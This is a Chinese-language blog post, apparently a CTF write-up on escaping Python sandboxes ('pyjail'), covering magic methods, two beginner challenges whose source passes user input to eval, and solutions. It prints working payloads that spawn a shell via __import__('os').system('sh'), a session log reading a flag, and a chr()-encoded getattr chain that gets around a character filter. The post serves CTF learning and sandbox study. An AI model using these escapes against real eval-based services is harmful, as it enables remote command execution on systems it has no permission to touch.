

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/avatar.png">
  <link rel="icon" href="/img/avatar.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="xiaocai">
  <meta name="keywords" content="">
  
    <meta name="description" content="参考链接[PyJail] python沙箱逃逸探究·总览（HNCTF题解） - 知乎 (zhihu.com) Python Jail 沙盒逃逸 合集 (xjx100.cn) 魔术方法  __init__：构造函数。这个在实例化类的时候就会用到，一般是接受类初始化的参数，并且进行一系列初始化操作。 __len__：返回对象的长度。对一个对象a使用len(a)时，会尝试调用a.__len__()。这个">
<meta property="og:type" content="article">
<meta property="og:title" content="Pyjail">
<meta property="og:url" content="http://xiaoxiaoxiaoxiaocai.github.io.com/2023/10/23/Pyjail/index.html">
<meta property="og:site_name" content="xiaocai">
<meta property="og:description" content="参考链接[PyJail] python沙箱逃逸探究·总览（HNCTF题解） - 知乎 (zhihu.com) Python Jail 沙盒逃逸 合集 (xjx100.cn) 魔术方法  __init__：构造函数。这个在实例化类的时候就会用到，一般是接受类初始化的参数，并且进行一系列初始化操作。 __len__：返回对象的长度。对一个对象a使用len(a)时，会尝试调用a.__len__()。这个">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-10-23T08:49:53.000Z">
<meta property="article:modified_time" content="2023-10-24T08:08:44.584Z">
<meta property="article:author" content="xiaocai">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Pyjail - xiaocai</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"xiaoxiaoxiaoxiaocai.github.io.com","root":"/","version":"1.9.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Xiaocai&#39;s blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Pyjail"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-23 16:49" pubdate>
          October 23, 2023 pm
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          14k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          115 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">Pyjail</h1>
            
            
              <div class="markdown-body">
                
                <h3 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h3><p>[<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/578966149">PyJail] python沙箱逃逸探究·总览（HNCTF题解） - 知乎 (zhihu.com)</a></p>
<p><a target="_blank" rel="noopener" href="http://lihuaxi.xjx100.cn/news/1475226.html?action=onClick">Python Jail 沙盒逃逸 合集 (xjx100.cn)</a></p>
<h3 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h3><ul>
<li><ul>
<li><code>__init__</code>：构造函数。这个在实例化类的时候就会用到，一般是接受类初始化的参数，并且进行一系列初始化操作。</li>
<li><code>__len__</code>：返回对象的长度。对一个对象<code>a</code>使用<code>len(a)</code>时，会尝试调用<code>a.__len__()</code>。这个做炼丹的同学应该很熟悉，例如要通过继承<code>torch.utils.data.Dataset</code>来实现自己的数据集时，就需要实现这个方法；</li>
<li><code>__str__</code>：返回对象的字符串表示。对一个对象<code>a</code>使用<code>str(a)</code>时，会尝试调用<code>a.__str__()</code>。这在我们自己实现一些类，譬如复数、二叉树、有限域、椭圆曲线等时，通过实现该方法，能将对象的内容较好地打印出来。（<code>print</code>函数中也会自动调用对象的<code>__str__</code>方法）相似地，还有<code>__int__</code>魔术方法也用于类型转换，不过较少使用；</li>
<li><code>__getitem__</code>：根据索引返回对象的某个元素。对一个对象<code>a</code>使用<code>a[1]</code>时，会尝试调用<code>a.__getitem__(1)</code>。同样，当我们通过继承<code>torch.utils.data.Dataset</code>来实现自己的数据集时，就需要实现这个方法。有<code>__getitem__</code>，自然也有对应的<code>__setitem__</code>；</li>
<li><code>__add__</code>、<code>__sub__</code>、<code>__mul__</code>、<code>__div__</code>、<code>__mod__</code>：算术运算，加减乘除模。如对一个对象<code>a</code>使用<code>a+b</code>时，会尝试调用<code>a.__add__(b)</code>。相应地，对于有些运算，对象需放在后面（第二个操作数）的，则需实现<code>__radd__</code>、<code>__rsub__</code>、<code>__rmul__</code>、<code>__rdiv__</code>、<code>__rmod__</code>，如椭圆曲线上的点的倍点运算<code>G -&gt; d * G</code>，就可以通过实现<code>__rmul__</code>来实现。</li>
<li><code>__and__</code>，<code>__or__</code>、<code>__xor__</code>：逻辑运算，和算术运算类似；</li>
<li><code>__eq__</code>，<code>__ne__</code>、<code>__lt__</code>、<code>__gt__</code>、<code>__le__</code>、<code>__ge__</code>：比较运算，和算术运算类似；例如<code>&#39;贵州&#39; &gt; &#39;广西&#39;</code>，就会转而调用<code>&#39;贵州&#39;.__gt__(&#39;广西&#39;)</code>；</li>
<li><code>__getattr__</code>：对象是否含有某属性。如果我们对对象<code>a</code>所对应的类实现了该方法，那么在调用未实现的<code>a.b</code>时，就会转而调用<code>a.__getattr__(b)</code>。这也等价于用函数的方法调用：<code>getattr(a, &#39;b&#39;)</code>。有<code>__getattr__</code>，自然也有对应的<code>__setattr__</code>；</li>
<li><code>__subclasses__</code>：返回当前类的所有子类。一般是用在<code>object</code>类中，在<code>object.__subclasses__()</code>中，我们可以找到<code>os</code>模块中的类，然后再找到<code>os</code>，并且执行<code>os.system</code>，实现RCE。</li>
</ul>
</li>
<li><code>dir</code>：查看对象的所有属性和方法。在我们没有思路的时候，可以通过该函数查看所有可以利用的方法；此外，在题目禁用引号以及小数点时，也可以先用拿到类所有可用方法，再索引到方法名，并且通过<code>getattr</code>来拿到目标方法。</li>
<li><code>chr</code>、<code>ord</code>：字符与ASCII码转换函数，能帮我们绕过一些WAF</li>
<li><code>globals</code>：返回所有全局变量的函数；</li>
<li><code>locals</code>：返回所有局部变量的函数；</li>
<li><code>__import__</code>：载入模块的函数。例如<code>import os</code>等价于<code>os = __import__(&#39;os&#39;)</code>；</li>
<li><code>__name__</code>：该变量指示当前运行环境位于哪个模块中。如我们python一般写的<code>if __name__ == &#39;__main__&#39;:</code>，就是来判断是否是直接运行该脚本。如果是从另外的地方import的该脚本的话，那<code>__name__</code>就不为<code>__main__</code>，就不会执行之后的代码。更多参考<a href="https://link.zhihu.com/?target=https://www.geeksforgeeks.org/__name__-a-special-variable-in-python/">这里</a>；</li>
<li><code>__builtins__</code>：包含当前运行环境中默认的所有函数与类。如上面所介绍的所有默认函数，如<code>str</code>、<code>chr</code>、<code>ord</code>、<code>dict</code>、<code>dir</code>等。在pyjail的沙箱中，往往<code>__builtins__</code>被置为<code>None</code>，因此我们不能利用上述的函数。所以一种思路就是我们可以先通过类的基类和子类拿到<code>__builtins__</code>，再<code>__import__(&#39;os&#39;).system(&#39;sh&#39;)</code>进行RCE；</li>
<li><code>__file__</code>：该变量指示当前运行代码所在路径。如<code>open(__file__).read()</code>就是读取当前运行的python文件代码。需要注意的是，<strong>该变量仅在运行代码文件时会产生，在运行交互式终端时不会有此变量</strong>；</li>
<li><code>_</code>：该变量返回上一次运行的python语句结果。需要注意的是，<strong>该变量仅在运行交互式终端时会产生，在运行代码文件时不会有此变量</strong>。</li>
</ul>
<p><strong>breakpoint 函数</strong></p>
<p>breakpoint()是3.7以后引入的内置函数，可以用于断点调试</p>
<p>pdb 模块定义了一个交互式源代码调试器，用于 Python 程序。它支持在源码行间设置（有条件的）断点和单步执行，检视堆栈帧，列出源码列表，以及在任何堆栈帧的上下文中运行任意 Python 代码。它还支持事后调试，可以在程序控制下调用。</p>
<p>在输入 breakpoint() 后可以代开 Pdb 代码调试器，在其中就可以执行任意 python 代码</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>优先考虑RCE起手式一种是 os.system(‘sh’)进入交互终端，另一种是os.popen(‘ls’).read()</p>
<p>object.<strong>subclasses</strong>()<code>中找到</code>os<code>模块中的类（一般是</code>&lt;class ‘os._wrap_close’&gt;<code>），另一种是先拿到</code><strong>builtins</strong><code>，再</code><strong>import</strong>(‘os’).system(‘sh’)</p>
<h3 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h3><h4 id="calc-jail-beginner"><a href="#calc-jail-beginner" class="headerlink" title="calc_jail_beginner"></a>calc_jail_beginner</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#Your goal is to read ./flag.txt</span><br><span class="hljs-comment">#You can use these payload liked `__import__(&#x27;os&#x27;).system(&#x27;cat ./flag.txt&#x27;)` or `print(open(&#x27;/flag.txt&#x27;).read())`</span><br><br>WELCOME = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">  _     ______      _                              _       _ _ </span><br><span class="hljs-string"> | |   |  ____|    (_)                            | |     (_) |</span><br><span class="hljs-string"> | |__ | |__   __ _ _ _ __  _ __   ___ _ __       | | __ _ _| |</span><br><span class="hljs-string"> | &#x27;_ \|  __| / _` | | &#x27;_ \| &#x27;_ \ / _ \ &#x27;__|  _   | |/ _` | | |</span><br><span class="hljs-string"> | |_) | |___| (_| | | | | | | | |  __/ |    | |__| | (_| | | |</span><br><span class="hljs-string"> |_.__/|______\__, |_|_| |_|_| |_|\___|_|     \____/ \__,_|_|_|</span><br><span class="hljs-string">               __/ |                                           </span><br><span class="hljs-string">              |___/                                            </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-built_in">print</span>(WELCOME)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the python jail&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Let&#x27;s have an beginner jail of calc&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Enter your expression and I will evaluate it for you.&quot;</span>)<br>input_data = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;&gt; &quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;Answer: &#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">eval</span>(input_data)))<br><br></code></pre></td></tr></table></figure>

<p>可以根据提示构建payload得到flag</p>
<p>也可以get交互式shell</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs py">nc node5.anna.nssctf.cn <span class="hljs-number">28782</span><br><br>  _     ______      _                              _       _ _<br> | |   |  ____|    (_)                            | |     (_) |<br> | |__ | |__   __ _ _ _ __  _ __   ___ _ __       | | __ _ _| |<br> | <span class="hljs-string">&#x27;_ \|  __| / _` | | &#x27;</span>_ \| <span class="hljs-string">&#x27;_ \ / _ \ &#x27;</span>__|  _   | |/ _` | | |<br> | |_) | |___| (_| | | | | | | | |  __/ |    | |__| | (_| | | |<br> |_.__/|______\__, |_|_| |_|_| |_|\___|_|     \____/ \__,_|_|_|<br>               __/ |<br>              |___/<br><br>Welcome to the python jail<br>Let<span class="hljs-string">&#x27;s have an beginner jail of calc</span><br><span class="hljs-string">Enter your expression and I will evaluate it for you.</span><br><span class="hljs-string">&gt;  __import__(&#x27;</span>os<span class="hljs-string">&#x27;).system(&#x27;</span>sh<span class="hljs-string">&#x27;)</span><br><span class="hljs-string">sh: 0: can&#x27;</span>t access tty; job control turned off<br>$ ls<br>flag  server.py<br>$ cat flag<br>flag=NSSCTF&#123;fb867efc-bcf4-4f2b-b340-41ee9ad4a5e8&#125;<br></code></pre></td></tr></table></figure>

<h4 id="calc-jail-beginner-level1"><a href="#calc-jail-beginner-level1" class="headerlink" title="calc_jail_beginner_level1"></a>calc_jail_beginner_level1</h4><figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-comment">#the function of filter will banned some string &#x27;,&quot;,i,b</span><br><span class="hljs-comment">#it seems banned some payload </span><br><span class="hljs-comment">#Can u escape it?Good luck!</span><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">filter</span>(<span class="hljs-params">s</span>):<br>    not_allowed = <span class="hljs-built_in">set</span>(<span class="hljs-string">&#x27;&quot;\&#x27;`ib&#x27;</span>)<br>    <span class="hljs-keyword">return</span> <span class="hljs-built_in">any</span>(c <span class="hljs-keyword">in</span> not_allowed <span class="hljs-keyword">for</span> c <span class="hljs-keyword">in</span> s)<br><br>WELCOME = <span class="hljs-string">&#x27;&#x27;&#x27;</span><br><span class="hljs-string">  _                _                           _       _ _   _                _ __ </span><br><span class="hljs-string"> | |              (_)                         (_)     (_) | | |              | /_ |</span><br><span class="hljs-string"> | |__   ___  __ _ _ _ __  _ __   ___ _ __     _  __ _ _| | | | _____   _____| || |</span><br><span class="hljs-string"> | &#x27;_ \ / _ \/ _` | | &#x27;_ \| &#x27;_ \ / _ \ &#x27;__|   | |/ _` | | | | |/ _ \ \ / / _ \ || |</span><br><span class="hljs-string"> | |_) |  __/ (_| | | | | | | | |  __/ |      | | (_| | | | | |  __/\ V /  __/ || |</span><br><span class="hljs-string"> |_.__/ \___|\__, |_|_| |_|_| |_|\___|_|      | |\__,_|_|_| |_|\___| \_/ \___|_||_|</span><br><span class="hljs-string">              __/ |                          _/ |                                  </span><br><span class="hljs-string">             |___/                          |__/                                                                                      </span><br><span class="hljs-string">&#x27;&#x27;&#x27;</span><br><br><span class="hljs-built_in">print</span>(WELCOME)<br><br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Welcome to the python jail&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Let&#x27;s have an beginner jail of calc&quot;</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Enter your expression and I will evaluate it for you.&quot;</span>)<br>input_data = <span class="hljs-built_in">input</span>(<span class="hljs-string">&quot;&gt; &quot;</span>)<br><span class="hljs-keyword">if</span> <span class="hljs-built_in">filter</span>(input_data):<br>    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;Oh hacker!&quot;</span>)<br>    exit(<span class="hljs-number">0</span>)<br><span class="hljs-built_in">print</span>(<span class="hljs-string">&#x27;Answer: &#123;&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(<span class="hljs-built_in">eval</span>(input_data)))<br><br></code></pre></td></tr></table></figure>

<p>也就是说，我们能通过<code>eval</code>执行任意命令，但是命令不能包含双引号、单引号、反引号、字母<code>i</code>和字母<code>b</code>。许多命令，如<code>import</code>、<code>__builtins__</code>、<code>bytes</code>都无法用。</p>
<p>Show subclasses with tuple开始</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">().__class__.__base__.__subclasses__()<br></code></pre></td></tr></table></figure>

<p>b用不了，因此想到getattr()</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">getattr</span>(().__class__, <span class="hljs-string">&#x27;__base__&#x27;</span>).__subclasses__()<br></code></pre></td></tr></table></figure>

<p>但是引号都被banl，可以使用chr函数</p>
<p>‘<strong>base</strong>‘</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)<br></code></pre></td></tr></table></figure>

<p><strong>subclasses</strong></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">117</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">99</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">108</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>))<br></code></pre></td></tr></table></figure>

<p>绕过WAF</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(().__class__,<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)),<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">117</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">99</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">108</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>))()<br></code></pre></td></tr></table></figure>

<p>找到os 在 ().<strong>class</strong>.<strong>base</strong>.<strong>subclasses</strong>()[-4].<strong>init</strong>.<strong>globals</strong><a href="'sh'">‘system’</a></p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py">().__class__.__base__.__subclasses__()[-<span class="hljs-number">4</span>].__init__.__globals__[<span class="hljs-string">&#x27;system&#x27;</span>](<span class="hljs-string">&#x27;sh&#x27;</span>)<br></code></pre></td></tr></table></figure>

<p>绕过WAF</p>
<figure class="highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs py"><span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(<span class="hljs-built_in">getattr</span>(().__class__,<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)),<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">117</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">99</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">108</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>))()[-<span class="hljs-number">4</span>],<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">105</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">110</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">105</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">116</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)),<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">103</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">108</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">111</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">98</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">97</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">108</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">95</span>))[<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">121</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">116</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">101</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">109</span>)](<span class="hljs-built_in">chr</span>(<span class="hljs-number">115</span>)+<span class="hljs-built_in">chr</span>(<span class="hljs-number">104</span>))<br></code></pre></td></tr></table></figure>

<p>然后进如shell交互界面</p>
